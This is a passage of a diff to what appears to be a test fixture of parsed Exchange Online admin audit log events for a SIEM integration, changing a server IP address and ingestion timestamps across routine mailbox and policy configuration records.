Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852960600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -151,12 +151,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -199,7 +199,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -211,8 +211,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177560700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852966700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -232,12 +232,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -267,7 +267,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -279,8 +279,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177564200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852972800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -300,12 +300,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -335,7 +335,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -347,8 +347,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177567200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852977800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -368,12 +368,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -404,7 +404,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -416,8 +416,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177570100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852981100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -437,12 +437,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -474,7 +474,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -486,8 +486,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177573100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852985900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -507,12 +507,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -542,7 +542,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -554,8 +554,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177576100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852991Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -575,12 +575,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -623,7 +623,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -635,8 +635,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177579400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852996300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -656,12 +656,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -704,7 +704,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -716,8 +716,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177582300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 